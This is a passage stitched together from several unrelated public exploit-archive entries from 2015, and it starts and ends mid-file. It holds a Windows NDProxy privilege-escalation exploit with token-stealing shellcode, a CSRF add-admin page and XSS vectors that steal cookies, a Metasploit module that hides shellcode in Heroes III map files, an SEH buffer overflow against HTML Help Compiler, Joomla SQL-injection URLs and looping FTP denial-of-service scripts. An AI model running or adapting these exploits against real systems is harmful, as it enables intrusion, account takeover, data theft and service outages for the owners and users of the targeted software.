}
DWORD inputBuffer [0x15] = {0};
DWORD returnedBytes = 0;
*(inputBuffer + 5) = 0x7030125;
*(inputBuffer + 7) = 0x34;
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
CloseHandle (ndProxyDeviceHandle);
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
return 0;
}
int main (int argc, char **argv)
{
if (argc != 2)
{
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
printf (" supported OS_TYPE:\n");
printf (" XP - Windows XP SP3 x86\n");
printf (" 2k3 - Windows 2003 SP2 x86\n");
printf ("[*] Note: the service \"Routing and Remote Access\"\n");
printf (" must be running on the target machine\n");
exit (0);
}
else
{
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
{
unsigned char shellcodeXP[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
exploit (shellcodeXP);
}
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
{
unsigned char shellcode2k3[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
exploit (shellcode2k3);
}
else
{
printf ("[-] Invalid argument\n");
printf (" Argument used: %s\n", argv[1]);
exit(0);
}
}
}
<!DOCTYPE html>
<!--
Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop
PHP/Laravel CMS licensed under Apache License, Version
2.0 which allows you to create your own website, blog
or online shop.
Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Stored
cross-site scripting vulnerabilitity is also discovered.
The issue is triggered when input passed via the POST
parameter 'option_value' is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session
in context of an affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5249
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
12.07.2015
-->
<html>
<title>Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit</title>
<br /><br />
<body><center>
<form action="http://localhost/microweber-latest/api/save_user" method="POST">
<input type="hidden" name="id" value="0" />
<input type="hidden" name="thumbnail" value="" />
<input type="hidden" name="username" value="Freakazoid" />
<input type="hidden" name="password" value="00110001" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="first_name" value="Joe" />
<input type="hidden" name="last_name" value="Black" />
<input type="hidden" name="is_active" value="1" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="basic_mode" value="0" />
<input type="hidden" name="api_key" value="" />
<input type="submit" value="CSRF Adminize" />
</form>
</body>
</html>
<br /><br />
<html>
<body>
<form action="http://localhost/microweber-latest/api/save_option" method="POST">
<input type="hidden" name="option_key" value="website_keywords" />
<input type="hidden" name="option_group" value="website" />
<input type="hidden" name="option_value" value='"><img src=j onerror=confirm("ZSL")>' />
<input type="submit" value="Store XSS" />
</form></center>
</body>
</html>
Job Manager Persistent XSS
Details
========================================================================================
Product: Job Manager Plugin For Wordpress
Vendor-URL: www.wp-jobmanager.com
CVE-ID: CVE-2015-2321
Credits
========================================================================================
Discovered by: Owais Mehtab
Affected Products:
========================================================================================
Job Manager Plugin <= 0.7.22
Description
========================================================================================
"Job Manager Plugin For Wordpress"
More Details
========================================================================================
A persistent Cross site scripting (XSS) in Job Manager Plugin has been discovered,
the plugin's email field was not sanitized thus the vulnerability can be easily
exploited and can be used to steal cookies,perform phishing attacks and other various
attacks compromising the security of a user.
Proof of Concept
========================================================================================
Click on the "send through your résume" and set the below vector in email field
'"><img src=x onerror=prompt(document.cookie);>
Now click on initiate chat
PoC Video
https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
'Description' => %q{
This module embeds an exploit into an ucompressed map file (.h3m) for
Heroes of Might and Magic III. Once the map is started in-game, a
buffer overflow occuring when loading object sprite names leads to
shellcode execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pierre Lindblad', # Vulnerability discovery
'John AAkerblom' # Vulnerability discovery, PoC and Metasploit module
],
'References' =>
[
[ 'EDB', '37716' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Targets' =>
[
[
'H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
{
# Two "Anticrash"-gadgets are needed or the game will crash before ret
#
# Anticrash1, needs to pass the following code down to final JMP:
# MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
# XOR EBX, EBX
# CMP EAX, EBX
# JE SHORT <crash spot> ; JMP to crash if EAX is 0
# MOV CL, BYTE PTR DS : [EAX - 1]
# CMP CL, BL
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
# CMP CL, 0FF
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
# CMP EDI, EBX
# JNE <good spot> ; JMP to good spot. Always occurs if we get this far
#
# Summary: An address which when incremented by 4 and then dereferenced
# leads to for example a string which is preceeded neither by a 0x00 or 0xFF
'Anticrash1' => 0x004497D4,
# Anticrash2, needs to return out of the following call (tricky):
#
# MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
# CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
#
# Summary: An address which when dereferenced leads to an address that
# when incremented by 4 and then deferenced leads to a function returning
# without accessing any registers/memory that would cause a crash.
'Anticrash2' => 0x006A6430,
'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
{
'Anticrash1' => 0x00456A48,
'Anticrash2' => 0x006A6830,
'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
{
# The two anticrash gadgets are accessed in reverse order for this target,
# meaning that the documentation above for Anticrash1 applies to Anticrash2
# here. However, Anticrash1 here is accessed differently than the other targets.
# Anticrash1, needs to pass the following code:
# CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
# JNE 00591F37
# MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
# Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
'Anticrash2' => 0x005CE200,
'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
'CRC32' => 0xFEEFB9EB
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 29 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME',
[
false,
'If file exists, exploit will be embedded' \
' into it. If not, a new default h3m file where' \
' it will be embedded will be created.',
'sploit.h3m'
])
], self.class)
end
def exploit
buf = ''
# Load h3m into buffer from uncompressed .h3m on disk/default data
begin
buf << read_file(datastore['FILENAME'])
print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
rescue Errno::ENOENT
print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
'default .h3m data')
buf << make_default_h3m
end
# Find the object attributes array in the file by searching for a sprite name that occurs
# as the first game object in all maps.
objects_pos = buf.index('AVWmrnd0.def')
if objects_pos.nil?
print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
'. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')
return
end
# Entries in the objects array start with a string size followed by game sprite name string
# Move back 4 bytes from the first sprite name to get to the start of the objects array
objects_pos -= 4
print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)
# Construct a malicious object entry with a big size, where the sprite name starts
# with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
# but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
# After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
# overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
# it returns to the CALL ESP-gadget are required for the game not to crash before returning.
size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
exp = ''
exp << [size].pack('V')
exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
exp << rand_text(target['Padding'])
exp << [target.ret].pack('V')
exp << [target['Anticrash1']].pack('V')
exp << [target['Anticrash2']].pack('V')
exp << payload.encoded
# Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
from = objects_pos
to = from + size
buf[from..to] = exp
print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)
# Demo version has a crc32 check to disallow other maps than the one it comes with.
if target['CRC32']
buf = forge_crc32(buf, target['CRC32'])
if Zlib.crc32(buf) == target['CRC32']
print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
else
print_error('Failed to forge CRC32')
return
end
end
# Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
file_create(buf)
end
def substring_pos(string, substring)
string.enum_for(:scan, substring).map { $~.offset(0)[0] }
end
#
# Loads a file
#
def read_file(fname)
buf = ''
::File.open(fname, 'rb') do |f|
buf << f.read
end
buf
end
#
# Returns data for a minimimum required S size h3m map containing 2 players
#
def make_default_h3m
buf = ''
# Set map specifications to 36x36 (0x24000000) map with 2 players, with
# default/no settings for name, description, victory condition etc
buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
buf << "\x00\x00\xff\xff\xff\x00"
buf << "\xFF" * 16
buf << "\x00" * 35
# Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
buf << "\x00" * (36 * 36 * 7)
# Set object attribute array count to 1
buf << "\x01\x00\x00\x00"
# Size of first sprite name, this will be overwritten
buf << "\x12\x34\x56\x78"
# Standard name for first object, which will be searched for
buf << 'AVWmrnd0.def'
buf
end
#
# Forge crc32 by adding 4 bytes at the end of data
# http://blog.stalkr.net/2011/03/crc-32-forging.html
#
def forge_crc32(data, wanted_crc)
crc32_reverse = [
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
]
# forward calculation of CRC up to pos, sets current forward CRC state
fwd_crc = 0xffffffff
data.each_byte do |c|
fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]
end
# backward calculation of CRC up to pos, sets wanted backward CRC state
bkd_crc = wanted_crc ^ 0xffffffff
# deduce the 4 bytes we need to insert
[fwd_crc].pack('<L').each_byte.reverse_each do |c|
bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c
end
res = data + [bkd_crc].pack('<L')
res
end
end
# Exploit Title: OSX Keychain - EXC_BAD_ACCESS
# Date: 22/07/2015
# Exploit Author: Juan Sacco
# Vendor Homepage: https://www.apple.com
# Software Link: https://www.apple.com/en/downloads/
# Version: 9.0 (55161)
# Tested on: OSX Yosemite 10.10.4
# CVE : None
# History - Reported to product-security@apple.com 20 Jul 2015
# Be careful: Crashing the Keychain will affect the user ability to use
Keychain stored passwords.
# How to reproduce it manually
1. Select a certificate, right click "New certificate preference.."
2. Under "Location or Email address:" add random values +9000
3. Click on Add to conduct the PoC manually
# Technically:
Performing @selector(addCertificatePreference:) from sender NSButton
0x608000148cf0
# Exception type
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_PROTECTION_FAILURE at 0x00007fff4d866828
External Modification Warnings:
VM Regions Near 0x7fff4d866828:
MALLOC_SMALL 00007f9e7d000000-00007f9e80000000 [ 48.0M]
rw-/rwx SM=PRV
--> STACK GUARD 00007fff4c7de000-00007fff4ffde000 [ 56.0M]
---/rwx SM=NUL stack guard for thread 0
Stack 00007fff4ffde000-00007fff507de000 [ 8192K]
rw-/rwx SM=COW thread 0
(lldb)
Process 490 resuming
Process 490 stopped
* thread #1: tid = 0x19b7, 0x00007fff92c663c3
Security`SecCertificateSetPreference + 325, queue =
'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2,
address=0x7fff4d866828)
frame #0: 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325
Security`SecCertificateSetPreference:
-> 0x7fff92c663c3 <+325>: callq 0x7fff92cf18b2 ; symbol stub
for: CFStringGetCString
0x7fff92c663c8 <+330>: movq %rbx, -0x670(%rbp)
0x7fff92c663cf <+337>: testb %al, %al
0x7fff92c663d1 <+339>: jne 0x7fff92c663d8 ; <+346>
Process: Keychain Access [598]
Path: /Applications/Utilities/Keychain
Access.app/Contents/MacOS/Keychain Access
Identifier: com.apple.keychainaccess
Version: 9.0 (55161)
Build Info: KeychainAccess-55161000000000000~620
Code Type: X86-64 (Native)
Parent Process: ??? [1]
Responsible: Keychain Access [598]
User ID: 501
Date/Time: 2015-07-28 13:32:05.183 +0200
OS Version: Mac OS X 10.10.4 (14E46)
Report Version: 11
Anonymous UUID: 08523B58-1EF8-DC4A-A7D7-CB31074E4395
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
VM Regions Near 0x7fff507776c8:
MALLOC_SMALL 00007ff93c800000-00007ff93e000000 [ 24.0M]
rw-/rwx SM=PRV
--> STACK GUARD 00007fff4e5d7000-00007fff51dd7000 [ 56.0M]
---/rwx SM=NUL stack guard for thread 0
Stack 00007fff51dd7000-00007fff525d7000 [ 8192K]
rw-/rwx SM=COW thread 0
rax: 0x0000000001e5e1a0 rbx: 0x0000000000000006 rcx: 0x0000000008000100
rdx: 0x0000000001e5e1a0
rdi: 0x000060000045b6c0 rsi: 0x00007fff507776d0 rbp: 0x00007fff525d5f30
rsp: 0x00007fff507776d0
r8: 0x0000000000000000 r9: 0x00007fff79e6a300 r10: 0x00007ff93c019790
r11: 0x00007fff79147658
r12: 0x000000000000002d r13: 0x00007fff507776d0 r14: 0x00007fff525d5880
r15: 0x00007ff93ae41680
rip: 0x00007fff901083c3 rfl: 0x0000000000010202 cr2: 0x00007fff507776c8
source: https://www.securityfocus.com/bid/55418/info
Flogr is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Flogr 2.5.6 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/
http://www.example.com/index.php?[any]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
#!/usr/bin/env python
#
# Exploit Title: Microsoft HTML Help Compiler SEH Based Overflow
# Date: 2015-08-13
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.microsoft.com
# Software Link: http://www.microsoft.com/downloads/details.aspx?FamilyID=00535334-c8a6-452f-9aa0-d597d16580cc&displaylang=en
# Version: 4.74.8702.0
# Tested on: Windows 7
#
from subprocess import Popen
from struct import pack
# 112 bytes All Windows Null-Free CreateProcessA Calc Shellcode
# We have only 189 bytes after SE Handler
# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
shellcode=""
shellcode+="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode+="\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode+="\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode+="\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode+="\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode+="\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode+="\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode+="\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode+="\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode+="\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode+="\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode+="\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode+="\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode+="\x53\x53\x53\x53\x52\x53\xff\xd7"
junk='\x61'*284
nseh='\xeb\x1e\x90\x90' # jump 30 bytes
nop='\x90'*40 # nop
seh=pack("<I", 0x45312d14) # pop ecx # pop ecx # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [HHA.dll]
payload=junk+nseh+seh+nop+shellcode
padding='\x61'*(10000-len(payload))
exploit=payload+padding
try:
Popen(["C:\Program Files\HTML Help Workshop\hhc.exe",exploit],shell=False)
print "Hack'n'Roll"
except:
print "Cannot run hhc.exe"
# Exploit Title: Joomla com_memorix component SQL Injection vulnerability
# Date: 13-08-2015
# Software Link: N/A
# Exploit Author: Omar AbuHassan
# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
# CVE: N/A
# Category: webapps
# Version: All
# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)
1. Description
Normal user can inject sql query in the url which lead to read data from the database.
2. Proof of Concept
http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI)
Injected column is # 3
http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,version(),444,555,666,777,888,999--+AbuHassan
** No solution yet from vendor **
#######################
# Greets to Palestine #
#######################
# Exploit Title: Joomla com_informations component SQL Injection vulnerability
# Date: 13-08-2015
# Software Link: N/A
# Exploit Author: Omar AbuHassan
# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
# CVE: N/A
# Category: webapps
# Version: All
# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)
1. Description
Normal user can inject sql query in the url which lead to read data from the database.
2. Proof of Concept
http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI)
Injected column is # 3
http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23
** No solution yet from vendor **
#######################
# Greets to Palestine #
#######################
#!/usr/bin/env python
#
# Exploit Title: Ability FTP Server afsmain.exe USER Command Remote Dos
# Date: 2015-08-15
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.codecrafters.com
# Software Link: http://www.codecrafters.com/AbilityFTPServer
# Version: 2.1.4
# Tested on: Windows 7
#
import socket
import sys
import os
def clear():
os.system("cls")
def banner():
print "############################################".center(80)
print "# Ability FTP Server DoS PoC #".center(80)
print "# Author: St0rn #".center(80)
print "# <fabien[at]anbu-pentest[dot]com> #".center(80)
print "############################################".center(80)
def createconn(ip):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((ip,21))
except:
print "\n"
print "[+] Server Down!".center(80)
sys.exit(0)
return s
def crash(sock):
try:
while 1:
sock.send('USER '+'a'*99999)
sys.stdout.write('.')
except:
sock.close()
############### Main ###############
clear()
banner()
if len(sys.argv)==2:
print "\n"
print "Waiting 2 or 3 minutes before crash".center(80)
print "(The server can be run without afsloader.exe)".center(80)
while 1:
s=createconn(sys.argv[1])
crash(s)
else:
print "\n"
print "Usage: AftpDos.py [Server IP]".center(80)
sys.exit(0)
#!/usr/bin/env python
#
# Exploit Title: Ability FTP Server Admin Panel AUTHCODE Command Remote Dos
# Date: 2015-08-15
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.codecrafters.com
# Software Link: http://www.codecrafters.com/AbilityFTPServer
# Version: 2.1.4
# Tested on: Windows 7
#
import socket
import sys
import os
def clear():
os.system("cls")
def banner():
print "############################################".center(80)
print "# Ability FTP Server Admin panel DoS #".center(80)
print "# Author: St0rn #".center(80)
print "# <fabien[at]anbu-pentest[dot]com> #".center(80)
print "############################################".center(80)
def createconn(ip):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((ip,7200))
except:
print "\n"
print "[+] Server Down!".center(80)
sys.exit(0)
return s
def crash(sock):
try:
while 1:
sock.send('authcode '+'a'*99999)
sys.stdout.write('.')
except:
sock.close()
############### Main ###############
clear()
banner()
if len(sys.argv)==2:
print "\n"
print "Waiting before crash".center(80)
print "(The server can be run without afsloader.exe)".center(80)
while 1:
s=createconn(sys.argv[1])
crash(s)
else:
print "\n"
print "Usage: AftpAdminDos.py [Server IP]".center(80)
sys.exit(0)
###
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Ubuntu 14.04 NetKit FTP Client Crash/DoS POC
#[+] Date: 15-08-2015
#[+] Type: Local Exploits
#[+] Tested on: Ubuntu 14.04
Works with other distros (11.04:https://www.exploit-db.com/exploits/17806/)
#[+] Twitter: @TCYB3R
##
cyb3rus@ubuntu:~$ gdp ftp
No command 'gdp' found, but there are 17 similar ones
gdp: command not found
cyb3rus@ubuntu:~$ gdb ftp
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ftp...(no debugging symbols found)...done.
(gdb) run ftp-server.demo.solarwinds.com
Starting program: /usr/bin/ftp ftp-server.demo.solarwinds.com
Connected to ftp-server.demo.solarwinds.com.
220 Serv-U FTP Server v15.1 ready...
Name (ftp-server.demo.solarwinds.com:cyb3rus): demo
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
